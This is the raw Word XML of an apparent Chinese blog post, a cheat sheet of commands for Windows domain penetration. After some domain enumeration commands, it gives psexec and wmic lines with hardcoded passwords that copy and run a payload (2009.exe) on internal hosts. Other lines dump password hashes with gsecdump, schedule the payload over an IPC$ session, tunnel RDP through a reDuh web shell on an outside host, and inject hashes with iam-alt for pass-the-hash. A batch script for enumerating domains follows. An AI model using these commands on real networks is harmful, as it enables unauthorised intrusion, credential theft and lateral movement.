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C6" w:rsidRPr="004162AD" w:rsidRDefault="006F3CC6" w:rsidP="006F3CC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lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>域渗透中常用命令</w:t>
      </w:r>
      <w:r w:rsidRPr="004162AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial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</w:p>
    <w:p w:rsidR="006F3CC6" w:rsidRPr="004162AD" w:rsidRDefault="006F3CC6" w:rsidP="006F3CC6">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150" w:line="300" w:lineRule="atLeast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2011-12-20 13:16:30|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分类：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hyperlink r:id="rId5" w:anchor="m=0&amp;t=1&amp;c=fks_087066083094084069080085085095093085082074083084084066" w:tooltip="入侵渗透" w:history="1">
        <w:r w:rsidRPr="004162AD">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="3354AE"/>
            <w:kern w:val="0"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-Hans"/>
          </w:rPr>
          <w:t>入侵渗透</w:t>
        </w:r>
      </w:hyperlink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|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标签：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|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字号</w:t>
      </w:r>
      <w:r w:rsidRPr="004162AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4171B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>大中小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订阅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常用命令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view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查看同一域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/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工作组的计算机列表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view /domain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查看域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/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工作组列表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view /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domain:Secwing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Secwing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域中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计算机列表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group /domain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查看所在域的组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user /domain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查看所在域用户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net user /domain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zerosoul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12345678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修改域用户密码，需要域管理员权限，或者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Ctrl+Alt+Del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点击修改则不需要域管理员权限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net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localgroup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administrators SECWING\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zerosoul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/add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域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Users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组用户添加到本地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Administrators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组，需要本地管理员或域管理员在本机登陆域后进行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lastRenderedPageBreak/>
        <w:t>下面的命令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只能用于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域控制器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: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group "Domain controllers"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查看域控制器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(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如果有多台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)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group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查看域的组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group "domain admins"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查看域管理员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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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net group "domain users"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查看域</w:t>
      </w:r>
      <w:r w:rsidR="004162AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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PS: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打开配置域控制器向导的命令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dcpromo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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psexec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/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accepteula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绕过第一次验证窗口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mstsc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/admin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解决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hash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无法抓出问题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wmic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/node:172.16.19.96 /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user:ABIMAQ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\Administrator /password:k78m90 process call create c:\kav\2009.exe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 xml:space="preserve">psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe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拷贝文件并且执行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 xml:space="preserve">psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u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抓取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hash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net use \\172.16.16.2\IPC$ "k78m90" /user:"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admintitrator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"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 xml:space="preserve">net use \\172.16.16.2\IPC$ "k78m90"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lastRenderedPageBreak/>
        <w:t>/user:"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aABIMAQ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\Administrator"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net time \\172.16.16.2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at \\172.16.16.2 13:50 2009.exe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java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reDuhClient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fdc1.cnhan.com http 80 /admin/reduh.aspx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reduh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连接命令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[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createTunnel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]1234:127.0.0.1:3389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端口转向命令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iam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-alt -h user-hash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这样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hash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就被注入了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 xml:space="preserve">whosthere-alt.exe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来查看是否被注入成功。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============================domain.bat=======================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@echo off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setlocal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ENABLEDELAYEDEXPANSION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@FOR /F "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usebackq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delims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=, " %%J IN (`net view /domain ^|find "OK!!!" /v ^|find "The command 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proofErr w:type="gram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completed</w:t>
      </w:r>
      <w:proofErr w:type="gram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successfully." </w:t>
      </w:r>
      <w:proofErr w:type="gram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/v ^|find "OK!!!"</w:t>
      </w:r>
      <w:proofErr w:type="gram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/v ^|find "--" /v ^|find "Domain" /v ^|find "" /v </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3CC6" w:rsidRPr="004162AD" w:rsidRDefault="006F3CC6" w:rsidP="006F3CC6">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150"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^|find "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コマンドは正常に終了しました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" /v /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i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`) do (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@echo =====domain:%%J========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@FOR /F "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usebackq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eol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=;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delims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=, " %%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i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in (`net view /domain:%%J ^|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findstr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"\\"`) DO (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@FOR /F "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usebackq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eol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=; tokens=1,2,3*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delims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=\\" %%a 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lastRenderedPageBreak/>
        <w:t>in (`echo %%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i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`) do (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 xml:space="preserve">@FOR /F "tokens=1,2,3,4*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usebackq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delims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=: " %%K IN ( -a -n 1 -w 100 %%a ^|</w:t>
      </w:r>
      <w:proofErr w:type="spell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findstr</w:t>
      </w:r>
      <w:proofErr w:type="spell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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3CC6" w:rsidRPr="004162AD" w:rsidRDefault="006F3CC6" w:rsidP="006F3CC6">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/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</w:pP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"Pinging"`) do (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 xml:space="preserve">@echo </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="004162AD">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="zh-Hans"/>
          </w:rPr>
          <w:t>\\%%L</w:t>
        </w:r>
      </w:hyperlink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 xml:space="preserve"> %%M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)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)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)</w:t>
      </w:r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</w:r>
      <w:proofErr w:type="gramStart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t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004162AD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:br/>
        <w:t>echo %0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00886204" w:rsidRPr="004162AD" w:rsidRDefault="00886204">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00886204" w:rsidRPr="00416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11"/>
    <w:rsid w:val="004162AD"/>
    <w:rsid w:val="006F3CC6"/>
    <w:rsid w:val="00886204"/>
    <w:rsid w:val="00D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3C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3CC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3CC6"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tcnt3">
    <w:name w:val="tcnt3"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pleft4">
    <w:name w:val="pleft4"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blogsep2">
    <w:name w:val="blogsep2"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pright4">
    <w:name w:val="pright4"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="zihao">
    <w:name w:val="zihao"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fc042">
    <w:name w:val="fc042"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
    <w:rPr>
      <w:color w:val="4171B3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="iblock13">
    <w:name w:val="iblock13"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3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3C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3CC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3CC6"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tcnt3">
    <w:name w:val="tcnt3"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pleft4">
    <w:name w:val="pleft4"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blogsep2">
    <w:name w:val="blogsep2"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pright4">
    <w:name w:val="pright4"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="zihao">
    <w:name w:val="zihao"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fc042">
    <w:name w:val="fc042"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3CC6"/>
    <w:rPr>
      <w:color w:val="4171B3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="iblock13">
    <w:name w:val="iblock13"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="006F3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96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2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91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52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03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8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46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le/%25%25L/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://f4u5t.blog.163.com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2012-07-28T04:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-07-16T06:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>